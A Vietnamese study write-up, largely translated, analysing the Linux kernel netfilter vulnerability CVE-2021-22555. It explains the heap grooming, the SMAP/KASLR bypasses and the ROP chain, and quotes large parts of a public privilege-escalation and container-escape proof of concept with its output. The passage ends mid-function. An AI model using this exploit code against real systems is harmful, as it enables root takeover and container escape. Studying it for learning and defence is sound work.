Tìm hiểu về CVE-2021-22555

Bài viết này nhằm mục đích học tập cá nhân, ghi lại những kiến thức đã học để nhớ và hiểu rõ hơn. Bài viết tham khảo chủ yếu từ CVE-2021-22555: Turning \x00\x00 into 10000$, phần lớn là dịch từ bài viết gốc cộng thêm một số lí giải của tôi.

Tổng quan về lỗ hổng

Lỗ hỗng cho phép viết dữ liệu bên ngoài vùng cho phép trên heap (heap out-of-bound)
Những phiên bản bị ảnh hưởng: Linux kernel *v2.6.19-rc1 - v5.12-rc8

Môi trường thực thi, kiểm thử

Ubuntu 20.04
Linux kernel: 5.8.0-48-gen

Phân tích lỗ hổng

Lỗ hổng được xác định nằm ở trong hàm xt_compat_target_from_user của /net/netfilter/x_tables.c:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28


void xt_compat_target_from_user(struct xt_entry_target *t, void **dstptr,
				unsigned int *size)
{
	const struct xt_target *target = t->u.kernel.target;
	struct compat_xt_entry_target *ct = (struct compat_xt_entry_target *)t;
	int pad, off = xt_compat_target_offset(target);
	u_int16_t tsize = ct->u.user.target_size;
	char name[sizeof(t->u.user.name)];

	t = *dstptr;
	memcpy(t, ct, sizeof(*ct));
	if (target->compat_from_user)
		target->compat_from_user(t->data, ct->data);
	else
		memcpy(t->data, ct->data, tsize - sizeof(*ct));
	pad = XT_ALIGN(target->targetsize) - target->targetsize;
	if (pad > 0)
		memset(t->data + target->targetsize, 0, pad);

	tsize += off;
	t->u.user.target_size = tsize;
	strlcpy(name, target->name, sizeof(name));
	module_put(target->me);
	strncpy(t->u.user.name, name, sizeof(t->u.user.name));

	*size += off;
	*dstptr += tsize;
}

tại line 17-18 chương trình sao chép pad kí tự 0 vào vùng nhớ bắt đầu bằng t->data + target->targetsize. Trong trường hợp này, target->targetsize không bị kiểm tra, do đó nó có thể chứa bất kì giá trị nào, kể cả giá trị âm.
Chúng ta không thể kiểm soát được giá trị của target->targetsize nhưng có thể sử dụng nhiều target với nhiều kích thước khác nhau bởi tên của chúng. Ví dụ như (TCPMSS, TTL, NFQUEUE)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57


// net/netfilter/x_NFLOG.c
static struct xt_target nflog_tg_reg __read_mostly = {
    .name       = "NFLOG",
    .revision   = 0,
    .family     = NFPROTO_UNSPEC,
    .checkentry = nflog_tg_check,
    .destroy    = nflog_tg_destroy,
    .target     = nflog_tg,
    .targetsize = sizeof(struct xt_nflog_info),
    .me         = THIS_MODULE,
};

// net/netfilter/x_NFQUEUE.c
static struct xt_target nfqueue_tg_reg[] __read_mostly = {
    {
        .name       = "NFQUEUE",
        .family     = NFPROTO_UNSPEC,
        .target     = nfqueue_tg,
        .targetsize = sizeof(struct xt_NFQ_info),
        .me         = THIS_MODULE,
    },
    {
        .name       = "NFQUEUE",
        .revision   = 1,
        .family     = NFPROTOR_UNSPEC,
        .checkentry = nfqueue_tg_check,
        .target     = nfqueue_tg_v1,
        .targetsize = sizeof(struct xt_NFQ_info_v1),
        .me         = THIS_MODULE,
    },
    {
        .name       = "NFQUEUE",
        .revision   = 2,
        .family     = NFPROTO_UNSPEC,
        .checkentry = nfqueue_tg_check,
        .target     = nfqueue_tg_v2,
        .targetsize = sizeof(struct xt_NFQ_info_v2),
        .me         = THIS_MODULE,
    },
    {
        .name       = "NFQUEUE",
        .revision   = 2,
        .family     = NFPROTO_UNSPEC,
        .checkentry = nfqueue_tg_check,
        .target     = nfqueue_tg_v2,
        .targetsize = sizeof(struct xt_NFQ_info_v2),
        .me         = THIS_MODULE,
    },
    {
        .name       = "NFQUEUE",
        .revision   = 3,
        .family     = NFPROTO_UNSPEC,
        .checkentry = nfqueue_tg_check,
        .targetsize = sizeof(struct xt_NFQ_info_v3),
        .me         = THIS_MODULE,
    },
};

target size không được căn chỉnh 8 bytes để điền khi pad > 0, do đó, target size càng lớn thì offset càng lớn. target size có kích thước lớn nhất mà tác giả tìm được là NFLOG, với nó, chúng ta có thể chọn offset lên đến 0x4c out-of-bounds (chúng ta có thể thay đổi offset bằng cách thêm padding vào giữa 2 cấu trúc struct xt_entry_match và struct xt_entry_target):

1
2
3
4
5
6
7
8
9


struct xt_nflog_info{
    /* 'len' will be used iff you set XT_NFLOG_F_COPY_LEN in flags */
    __u32   len;
    __u16   group;
    __u16   threshold;
    __u16   flags;
    __u16   pad;
    char    prefix[64];
};

Bên cạnh đó, t->data được cấp phát bởi hàm xt_alloc_table_info trong /net/netfilter/x_tables.c

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16


struct xt_table_info *xt_alloc_table_info(unsigned int size)
{
	struct xt_table_info *info = NULL;
	size_t sz = sizeof(*info) + size;

	if (sz < sizeof(*info) || sz >= XT_MAX_TABLE_SIZE)
		return NULL;

	info = kvmalloc(sz, GFP_KERNEL_ACCOUNT);
	if (!info)
		return NULL;

	memset(info, 0, sizeof(*info));
	info->size = size;
	return info;
}

Vùng nhớ được ghi cấp phát ở line 9 với flag GFP_KERNEL_ACCOUNT và kích thước là sz
Mặc dù vậy, kích thước tối thiểu > 0x100, có nghĩa kích thước nhỏ nhất của đối tượng có thể cấp phát là kmalloc-512. Chúng ta tìm đối tượng được cấp phát giữa kmalloc-512 và kmalloc-8192 để khai thác.

~~Tại sao biết 0x100? size là đối tượng chúng ta truyền vào, do đó, để biết cần trace xem hàm này được gọi ở đâu?~~ Vì kích thước của struct xt_table_info = 0x100

Kích thước SIZE này chúng ta kiểm soát được bằng cách tìm xem hàm xt_alloc_table_info được gọi, ví dụ như hàm static int compat_do_replace():

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23


static int
compat_do_replace(struct net *net, void __user *user, unsigned int len)
{
    int ret;
    struct compat_ipt_replace tmp;
    struct xt_table_info *newinfo;
    void *loc_cpu_entry;
    struct ipt_entry *iter;

    if (copy_from_user(&tmp, user, sizeof(tmp)) != 0) // size của tmp được xác địn bởi user
        return -EFAULT;

    /* overflow check */
    if (tmp.num_counters >= INT_MAX / sizeof(struct xt_counters))
        return -ENOMEM;
    if (tmp.num_counters == 0)
        return -EINVAL;

    tmp.name[sizeof(tmp.name)-1] = 0;

    newinfo = xt_alloc_table_info(tmp.size);  // size của tmp được truyền vào
    ......
}

Vì t->data chúng ta có thể kiểm soát được thông qua size, nên bây giờ ta tìm cách đưa nó về cuối cùng của heap block. Ta xem xét hàm compat_copy_entry_from_user

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35


static void
compat_copy_entry_from_user(struct compat_ipt_entry *e, void **dstptr,
                unsigned int *size,
                struct xt_table_info *newinfo, unsigned char *base)
{
    struct xt_entry_target *t;
    struct ipt_entry *de;
    unsigned int origsize;
    int h;
    struct xt_entry_match *ematch;

    origsize = *size;
    de = *dstptr;
    memcpy(de, e, sizeof(struct ipt_entry));
    memcpy(&de->counters, &e->counters, sizeof(e->counters));

    *dstptr += sizeof(struct ipt_entry);
    *size += sizeof(struct ipt_entry) - sizeof(struct compat_ipt_entry);

    xt_ematch_foreach(ematch, e)
        xt_compat_match_from_user(ematch, dstptr, size);

    de->target_offset = e->target_offset - (origsize - *size);
    t = compat_ipt_get_target(e);
    xt_compat_target_from_user(t, dstptr, size);

    de->next_offset = e->next_offset - (origsize - *size);

    for (h = 0; h < NF_INET_NUMHOOKS; h++) {
        if ((unsigned char *)de - base < newinfo->hook_entry[h])
            newinfo->hook_entry[h] -= origsize - *size;
        if ((unsigned char *)de - base < newinfo->underflow[h])
            newinfo->underflow[h] -= origsize - *size;
    }
}

Chúng ta thấy tại line 15 dòng lệnh *dstptr += sizeof(struct ipt_entry); sẽ đẩy con trỏ t->data về phía cuối của heap gần hơn. Sau đó, trong hàm xt_compat_match_from_user tại line 25, con trỏ dstptr tiếp tục được cộng *dstptr += msize làm cho t->data thêm một lần nữa chạy gần về phía cuối heap hơn.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28


void xt_compat_match_from_user(struct xt_entry_match *m, void **dstptr, unsigned int *size)
{
    const struct xt_match *match = m->u.kernel.match;
    struct compat_xt_entry_match *cm = (struct compat_xt_entry_match *)m;
    int pad, off = xt_compat_match_offset(match);
    u_int16_t msize = cm->u.user.match_size;
    char name[sizeof(m->u.user.name)];

    m = *dstptr;
    memcpy(m, cm, sizeof(*cm));
    if (match->compat_from_user)
        match->compat_from_user(m->data, cm->data);
    else
        memcpy(m->data, cm->data, msize - sizeof(*cm));
    pad = XT_ALIGN(match->matchsize) - match->matchsize
    if (pad > 0)
        memset(m->data + match->matchsize, 0, pad);

    msize += off;
    m->u.user.match_size = msize;
    strlcpy(name, match->name, sizeof(name));
    module_put(match->me);
    strncpy(m->u.user.name, name, sizeof(m->u.user.name));

    *size += off;
    *dstptr += msize;

}

và msize được kiểm soát bằng cách xây dựng cấu trúc dữ liệu ở tầng user. Do đó, chúng ta có một chiến lược, là kiểm soát msize -> dstptr->t->data về cuối cùng của heap block, sau đó kiểm soát target->targetsize để ghi vào nội dung vào heap block tiếp theo.

Khai thác lỗ hổng

struct msg_msg

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20


// include/linux/msg.h
/* one msg_msg struct for each message */
struct msg_msg{
    struct list_head m_list;
    long m_type;
    size_t m_ts;    /* message text size */
    struct *security;
    /* the actual message follows immediately */
};

// include/linux/types.h
struct list_head {
    struct list_head *next, *prev;
};

// ipc/msgutils.c
struct msg_msgseg{
    struct msg_msgseg *next;
    /* The next part of the message follow immediately*/
};

struct msg_msg được cấp phát bởi lời gọi hệ thống msgsnd trong ipc/msgutil.c

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36


static struct msg_msg *alloc_msg(size_t len)
{
    struct msg_msg *msg;
    struct msg_msgseg **pseg;
    size_t alen;

    alen = min(len, DATALEN_MSG);
    msg = kmalloc(sizeof(*msg) + alen, GFP_KERNEL_ACCOUNT);
    if (msg == NULL)
        return NULL;

    msg->next = NULL;
    msg->security = NULL;

    len -= alen;
    pseg = &msg->next;
    while (len > 0){
        struct msg_msgseg *seg;

        cond_resched();

        alen = min(len, DATALEN_SEG);
        seg = kmalloc(sizeof(*seg) + alen, GFP_KERNEL_ACCOUNT);
        if (seg == NULL)
            goto out_err;
        *pseg = seg;
        pseg = &seg->next;
        len -= alen;
    }

    return msg;

out_err:
    free_msg(msg);
    return NULL;
}

len là kích thước dữ liệu của cấu trúc msg_msg.

Tạo ra UAF

Nhiều message queues được tạo khi sử dụng msgget().
Sau đó, sử dụng msgsnd() để gửi message với kích thước 4096 cho mỗi message queue.
Cuối cùng, sau khi gửi một số lượng lớn các messages, một số cấu trúc struct msg_msg trong message queue được cấp phát liên tục trên heap.
.
Sau đó, msgsnd để gửi một message có kích thước 1024 tới mỗi message queue. Message có kích thước 1024 sẽ xâu chuỗi với message kích thước 4096 và lưu trong thành phần struct list_head của struct msg_msg.
.
Khi gọi msgrcv để đọc các phần của 4096 message, nó sẽ giải phóng vùng nhớ mà cấu trúc msg_msg đã giữ trên heap.
.
Cuối cùng, khi gọi hàm xt_alloc_table_info để dùng cho những block 4096 trên heap thì nó đã bị giải phóng ở bước trước đó. Lí tưởng, chúng ta không nên giải phóng cấu trúc A ngày sau 4096 heap block để khi gọi xt_alloc_table_info chúng ta có thể sử dụng out-of-bounds để viết mã trỏ tới những byte cuối của cấu trúc struc msg_msg A m_list.next = 0.
.
Có một cơ hội rằng 2 4096 struct msg_msg cùng trỏ tới cung cấu trúc 1024 struct msg_msg B, nó sẽ tham khảo tới một cấu trúc 4096 struct msg_msg khác và UAF sẽ xuất hiện.
.
Để xác định cấu trúc struct msg_msg B có đang bị trỏ tới 2 lần hay không, ta gửi message có nội dung tương ứng với số thứ tự của message: ví dụ mesage 1 có nội dung là 1, message 2 có nội dung là 2, …. message thứ 4096 có nội dung là 4096. Khi lỗi xảy ra, mỗi message của hàng đợi đều được đọc qua, nếu tính năng nào của cấu trúc B có nội dung không tương ứng với chỉ mục, có nghĩa nó không nằm trong hàng đợi, điều này cũng có nghĩa cấu trúc B đang tồn tại 2 struct trỏ tới nó.

Bypass SMAP

Đến đây, struct msg_msg B đang bị double referemced, cái thứ nhất giải phóng thằng B, và cái còn lại trò tới B chúng ta có thể kiểm soát được.
Bây giờ chúng ta dùng hàm socketpair() để spray heap, spray lượng lớn các message với kích thước 1024 và tạo ra một fake struct struct msg_msg structure. lý tưởng chúng ta có thể phục hồi cấu trúc msg_msg B đã bị giải phóng.

Chú ý rằng mlist.next là 41414141 vì chúng ta không biết địa chỉ của kernel (khi SMAP được bật, chúng ta không thể tính ra địa chỉ cụ thể của user). Không có địa chỉ của kernel thì rất quan trọng vì nó làm chúng ta không thể giải phóng vùng nhớ 1 lần nữa. Nguyên nhân là trong khi hàm msgrcv(), message dược hủy liên kết khỏi hàng đợi là một danh sách vòng tròn.
Một số trường của cấu trúc struct msg_msg cho phép chúng ta leak được những thông tin này. Cụ thể, trường m_ts được dùng để xác định lượng dữ liệu trả về cho userland:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16


// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/ipc/msgutil.c
struct msg_msg *copy_msg(struct msg_msg *src, struct msg_msg *dst)
{
    struct msg_msgseg *dst_pseg, *src_pseg;
    size_t len = src->m_ts;
    size_t alen;

    if (src->m_ts > dst->m_ts)
        return ERR_PTR(-EINVAL);

    alen = min(len, DATALEN_MSG);
    memcpy(dst + 1, src + 1, alen);

    ...
    return dst;
}

Kích thước ban đầu của message này là 1024-sizeof(struct msg_msg) bytes, chúng ta có thể tạo DATALEN_MSG=4096-xizeof(struct msg_msg). Do đó chúng ta có thể leak được thông tin từ header của struct msg_msg trong message kế tiếp. message queue được hiện thực nhưng 1 danh sách vòng tròn, do đó, mlist.next sẽ trỏ về message chính.
Khi biết được địa chỉ của message chính, chúng ta có thể tạo lại fake strct msg_msg với đại chỉ là next (segment tiếp theo). Nội dung của message chính có thể được leak bằng cách đọc nhiều hơn DATALEN_MSG bytes. Địa chỉ của con trỏ mlist.next được leak từ message chính sẽ tiết lộ đại chỉ cảu message thứ 2, nó nằm kề cấu trúc struct msg_msg mà chung ta muốn làm giả. Lấy địa chỉ này từ đi 1024 chúng ta sẽ có được địa chỉ của message mà chúng ta muốn kiểm soát.

~~vẫn chưa hiểu primary message là gì? trỏ như thế nào?~~ Đọc kĩ hơn phần phân tích POC, flow thì sẽ hiểu rõ

Một user-after-free tốt hơn.

Tới đây chúng ta phải xây dựng được một cấu trúc giả struct msg_msg với địa chỉ leak được là mlist.next và mlist.prev (nghĩa là nó tự trỏ tới chính nó), bây giờ làm sao để fake message bị free trong hàng đợi fake message -queue.

better_uaf1

Khi sử dụng unix sockets, chúng ta có một đối tượng struct sk_buff trỏ tới fake message. Điều này có nghĩa khi chúng ta giải phóng tin nhắn giả của mình, tham thảo tới nó vẫn còn tồn ở đó.

dữ liệu của vùng nhớ trên struct sk_buff là một chất liệu tuyệt vời để khai thác, vì nó không chưa thông tin tiêu đề nào, nghĩa là chúng ta có thể sử dụng nó để giải phóng bất kì đối tượng nào trên vùng nhớ này. Trong khi đó, nếu so sánh với kịch bản uaf thì chúng ta phải giải phóng đối tượng struct msg_msg, điều này chỉ được thực hiện nếu hai phần tử đầu tiên của con trỏ có thể ghi được

Tìm đối tượng khai thác

Đối tượng khai thác tốt nhất là đối tượng có con trỏ hàm trong cấu trúc này. Victim phải cấp phát với GFP_KERNEL_ACCOUNt

Cấu trúc struct pipe_buffer được cấp phát tròng kmalloc-1024 (đây là lí do tại sao mesage thứ 2 là 1024 bytes). Cấu trúc struct pipe_buffer có thể được cấp phát dễ dàng với pipe() mà có hàm alloc_pipe_info() như một chương trình con:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13


// https://git.kernel.org/pub/scm/linux/kernel/git/torvals/linux.git/tree/fs/pipe.c
struct pipe_inode_info *alloc_pipe_info(void)
{
    ...
    unsigned long pipe_bufs = PIPE_DEF_BUFFERS;
    ...
    pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT);
    if (pipe == NULL)
        goto out_free_uid;
    ...
    pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer), GFP_KERNEL_ACCOUNT);
    ...
}

Nó không trực tiếp chứa con trỏ hàm, nó chứa con trỏ tới cấu trúc struct pipe_buf_operations mà cấu trúc này lại có con trỏ hàm mà chúng ta cần:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19


// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/include/linux/pipe_fs_i.h

struct pipe_buffer{
    struct page *page;
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;
    unsigned int flags;
    unsigned long private;
};

struct pipe_buf_operations {
    ...
    /*
     * When The contents of this pipe buffer has been completely
     * consumed by a reader, ->release() is called.
     */
    void (*release)(struct pipe_node_info *, struct pipe_buffer *);
    ...
};

Bypassing KASLR/SMEP

Khi viết vào pipes, câu trúc struct pipe_buffer bị ghi đè, trong đó ops nó trỏ tới một cấu trúc tĩnh nằm trên .data segment: anon_pipe_buf_ops:

1
2
3
4
5
6


    // https://git.kernel.org/pub/scm/linux/kernel/git/tovalds/linux.git/tree/fs/pipe.c
    static const struct pipe_buf_operations alloc_pipe_buf_ops = {
            .release        = anon_pipe_buf_release,
            .try_steal      = anon_pipe_buf_try_steal,
            .get            = generic_pipe_buf_get,
    };

Vì khoảng cách giữa địa chỉ của .data segment và .text không đổi, nên ta tính được địa chỉ của kernel_base_addr từ anon_pipe_buf_ops.

~~Tính như thế nào?~~ Mô tả ở phần POC

Phun nhiều cấu trúc struct pipe_buffer và chỉnh sửa lại vị tyris của cấu trúc struct sk_buff của data buffer.
Chúng ta đọc dữ liệu từ sk_buff để leak nội dụng của struct pipe_buffer và lấy đại chỉ của anon_pipe_buf_ops
Với thông tin này, chúng ta sẽ tìm JOP/ROP gadgets. Khi đọc từ unix socket, chúng ta cần giải phóng vùng nhớ của nó.

Nâng quyền

Tạo một cấu trúc struct pipe_buffer với mộ con trỏ ops trỏ tới một cấu trúc struct pipe_buf_operations. Cấu trúc này đặt tại cùng địa điểm vì chúng ta biết địa chỉ của nó, chứa hàm mà chúng ta muốn thực thi khi được giải phóng.
Cuối cùng, đóng hết tất cả các pipes => kích hoạt giải phóng vùng nhớ => kích hoạt JOP chain.

Kernel ROP chain

Lưu địa chỉ của RBP tại một só địa chỉ trong kernel để sử dụng khi thực thi
=> gọi commit_creds(prepare_kernel_cred(NULL)) để install kernel credentials
=> gọi switch_task_namespace(find_task_by_vpid(1), init_nsproxy) để chuyển không gian tên của tiến trình 1 tới 1 trong những tiến trình khởi tạo.
=> khô phục giá trị của RBP và trả về thực thi đã dừng (free_pipe_info() trả về).

Thoát container và nhảy vào root shell

1
2
3
4
5
6


    setns(open("/proc/1/ns/mnt", O_RDONLY), 0);
    setns(open("/proc/1/ns/pid", O_RDONLY), 0);
    setns(open("/proc/1/ns/net", O_RDONLY), 0);

    char *args[] = {"/bin/bash", "-i", NULL};
    execve(args[0], args, NULL);

Phân tích POC

Tiếp theo, chúng ta sẽ đi phân tích poc của Andy Nguyen
Như demo, poc của anh Any Nguyen cho thấy rất rõ các bước để khai thác từ việc khởi tạo ở STAGE0 đến làm tràn bộ nhớ ở STAGE1, vượt qua SMAP, KSALR, thực thi mã khai thác và thoát khỏi container.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44


[+] Linux Privilege Escalation by theflow@ - 2021

[+] STAGE 0: Initialization
[*] Setting up namespace sandbox...
[*] Initializing sockets and message queues...

[+] STAGE 1: Memory corruption
[*] Spraying primary messages...
[*] Spraying secondary messages...
[*] Creating holes in primary messages...
[*] Triggering out-of-bounds write...
[*] Searching for corrupted primary message...
[+] fake_idx: ffc
[+] real_idx: fc4

[+] STAGE 2: SMAP bypass
[*] Freeing real secondary message...
[*] Spraying fake secondary messages...
[*] Leaking adjacent secondary message...
[+] kheap_addr: ffff91a49cb7f000
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Leaking primary message...
[+] kheap_addr: ffff91a49c7a0000

[+] STAGE 3: KASLR bypass
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Freeing sk_buff data buffer...
[*] Spraying pipe_buffer objects...
[*] Leaking and freeing pipe_buffer object...
[+] anon_pipe_buf_ops: ffffffffa1e78380
[+] kbase_addr: ffffffffa0e00000

[+] STAGE 4: Kernel code execution
[*] Spraying fake pipe_buffer objects...
[*] Releasing pipe_buffer objects...
[*] Checking for root...
[+] Root privileges gained.

[+] STAGE 5: Post-exploitation
[*] Escaping container...
[*] Cleaning up...
[*] Popping root shell...

STAGE0 - Khởi tạo

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28


  printf("[+] STAGE 0: Initialization\n");

  printf("[*] Setting up namespace sandbox...\n");
  if (setup_sandbox() < 0)
    goto err_no_rmid;

  printf("[*] Initializing sockets and message queues...\n");

  if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
    perror("[-] socket");
    goto err_no_rmid;
  }

  for (int i = 0; i < NUM_SOCKETS; i++) {
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, ss[i]) < 0) {
      perror("[-] socketpair");
      goto err_no_rmid;
    }
  }

  for (int i = 0; i < NUM_MSQIDS; i++) {
    if ((msqid[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666)) < 0) {
      perror("[-] msgget");
      goto err_no_rmid;
    }
  }

  printf("\n");

msqid stand for: Message queue identifier,

Hàm setup_sandbox() có tác thiết lập giới hạn của CPU (dòng 11-17) nhằm mục đích phục có quá trình spray các message.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20


int setup_sandbox(void) {
  if (unshare(CLONE_NEWUSER) < 0) {
    perror("[-] unshare(CLONE_NEWUSER)");
    return -1;
  }
  if (unshare(CLONE_NEWNET) < 0) {
    perror("[-] unshare(CLONE_NEWNET)");
    return -1;
  }

  cpu_set_t set;
  CPU_ZERO(&set);
  CPU_SET(0, &set);
  if (sched_setaffinity(getpid(), sizeof(set), &set) < 0) {
    perror("[-] sched_setaffinity");
    return -1;
  }

  return 0;
}

Lưu ý, hàm unshare ở dòng 2 và 6 có thể bị chặn bởi cơ chế Seccomp trên docker. Khi đó, hoặc bạn có thể không gọi hai lệnh này, hoặc bạn có thể chạy docker với tùy chọn --security-opt seccomp=unconfined:

1
2


docker run --rm -it --security-opt seccomp=unconfined debian:jessie \
    unshare --map-root-user --user sh -c whoami

Sau đó, chúng ta khởi tạo socket, tạo socketpair (dòng 14-19) và dùng hàm msgget() để tạo hàng đợi messages (dòng 21-26)

STAGE1 - Làm tràn bộ nhớ

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61


printf("[+] STAGE 1: Memory corruption\n");

  printf("[*] Spraying primary messages...\n");
  for (int i = 0; i < NUM_MSQIDS; i++) {
    memset(&msg_primary, 0, sizeof(msg_primary));
    *(int *)&msg_primary.mtext[0] = MSG_TAG;
    *(int *)&msg_primary.mtext[4] = i;
    if (write_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) <
        0)
      goto err_rmid;
  }

  printf("[*] Spraying secondary messages...\n");
  for (int i = 0; i < NUM_MSQIDS; i++) {
    memset(&msg_secondary, 0, sizeof(msg_secondary));
    *(int *)&msg_secondary.mtext[0] = MSG_TAG;
    *(int *)&msg_secondary.mtext[4] = i;
    if (write_msg(msqid[i], &msg_secondary, sizeof(msg_secondary),
                  MTYPE_SECONDARY) < 0)
      goto err_rmid;
  }

  printf("[*] Creating holes in primary messages...\n");
  for (int i = HOLE_STEP; i < NUM_MSQIDS; i += HOLE_STEP) {
    if (read_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) <
        0)
      goto err_rmid;
  }

  printf("[*] Triggering out-of-bounds write...\n");
  if (trigger_oob_write(s) < 0)
    goto err_rmid;

  printf("[*] Searching for corrupted primary message...\n");
  for (int i = 0; i < NUM_MSQIDS; i++) {
    if (i != 0 && (i % HOLE_STEP) == 0)
      continue;
    if (peek_msg(msqid[i], &msg_secondary, sizeof(msg_secondary), 1) < 0)
      goto err_no_rmid;
    if (*(int *)&msg_secondary.mtext[0] != MSG_TAG) {
      printf("[-] Error could not corrupt any primary message.\n");
      goto err_no_rmid;
    }
    if (*(int *)&msg_secondary.mtext[4] != i) {
      fake_idx = i;
      real_idx = *(int *)&msg_secondary.mtext[4];
      break;
    }
  }

  if (fake_idx == -1 && real_idx == -1) {
    printf("[-] Error could not corrupt any primary message.\n");
    goto err_no_rmid;
  }

  // fake_idx's primary message has a corrupted next pointer; wrongly
  // pointing to real_idx's secondary message.
  printf("[+] fake_idx: %x\n", fake_idx);
  printf("[+] real_idx: %x\n", real_idx);

  printf("\n");

Spraying primary messages

Cấu trúc của primary messages được xây dựng:

1
2
3
4


struct {
  long mtype;
  char mtext[PRIMARY_SIZE - MSG_MSG_SIZE];
} msg_primary;

với MSG_MSG_SIZE là kích thước của cấu trúc msg_msg:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10


#define MSG_MSG_SIZE (sizeof(struct msg_msg))

struct msg_msg {
  uint64_t m_list_next;
  uint64_t m_list_prev;
  uint64_t m_type;
  uint64_t m_ts;
  uint64_t next;
  uint64_t security;
};

Hàm write_msg:

1
2
3
4
5
6
7
8


int write_msg(int msqid, const void *msgp, size_t msgsz, long msgtyp) {
  *(long *)msgp = msgtyp;
  if (msgsnd(msqid, msgp, msgsz - sizeof(long), 0) < 0) {
    perror("[-] msgsnd");
    return -1;
  }
  return 0;
}

Hàm này gọi msgsnd để gửi những message có kích thước là 4096. Cấu trúc msg_primary bắt nguồn từ lệnh này
Tham số thứ ba được truyền là msgsz - sizeof(long) vì tham số này lấy kích thước của phần mtext, nên chúng ta lấy kích thước của cả cấu trúc msg_primary trừ cho kích thước của mtype.
Để hiểu chi tiết hơn, bạn có thể đọc ở đây .

dòng 6-7 dùng với mục đích kiểm tra double reference ở các bước sau.

Spraying second messages

1
2
3
4
5
6
7
8
9


 printf("[*] Spraying secondary messages...\n");
  for (int i = 0; i < NUM_MSQIDS; i++) {
    memset(&msg_secondary, 0, sizeof(msg_secondary));
    *(int *)&msg_secondary.mtext[0] = MSG_TAG;
    *(int *)&msg_secondary.mtext[4] = i;
    if (write_msg(msqid[i], &msg_secondary, sizeof(msg_secondary),
                  MTYPE_SECONDARY) < 0)
      goto err_rmid;
  }

Tạo secondary message tương tự với tạo primary messages, chỉ khác là kích thước của msg_secondary lúc này là 1024 thay vì 4096, do đó, cấu trúc của msg_secondary sẽ là:

1
2
3
4


struct {
  long mtype;
  char mtext[SECONDARY_SIZE - MSG_MSG_SIZE];
} msg_secondary;

Với SECONDARY_SIZE = 1024.

Creating holes in primary messages

1
2
3
4
5
6


  printf("[*] Creating holes in primary messages...\n");
  for (int i = HOLE_STEP; i < NUM_MSQIDS; i += HOLE_STEP) {
    if (read_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) <
        0)
      goto err_rmid;
  }

Dùng vòng for để giải phóng các primary message với HOLE_STEP = 1024 và NUM_MSQIDS = 4096.
Hàm read_msg được định nghĩa như sau:

1
2
3
4
5
6
7


int read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
  if (msgrcv(msqid, msgp, msgsz - sizeof(long), msgtyp, 0) < 0) {
    perror("[-] msgrcv");
    return -1;
  }
  return 0;
}

Dễ thấy, read_msg và write_msg là một cặp hàm gọi tương ứng các lệnh msgsnd và msgrcv để gửi và nhận các messages. Với msgrcv, sau khi nhận xong, nó sẽ giải phóng vùng nhớ được nhận, do đó, nó sẽ tạo ra các lỗ hổng có kích thước bằng 1024 trong các primary message.

Triggering out-of-bounds write…

1
2
3


  printf("[*] Triggering out-of-bounds write...\n");
  if (trigger_oob_write(s) < 0)
    goto err_rmid;

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37


int trigger_oob_write(int s) {
  struct __attribute__((__packed__)) {
    struct ipt_replace replace;
    struct ipt_entry entry;
    struct xt_entry_match match;
    char pad[0x108 + PRIMARY_SIZE - 0x200 - 0x2];
    struct xt_entry_target target;
  } data = {0};

  data.replace.num_counters = 1;
  data.replace.num_entries = 1;
  data.replace.size = (sizeof(data.entry) + sizeof(data.match) +
                       sizeof(data.pad) + sizeof(data.target));

  data.entry.next_offset = (sizeof(data.entry) + sizeof(data.match) +
                            sizeof(data.pad) + sizeof(data.target));
  data.entry.target_offset =
      (sizeof(data.entry) + sizeof(data.match) + sizeof(data.pad));

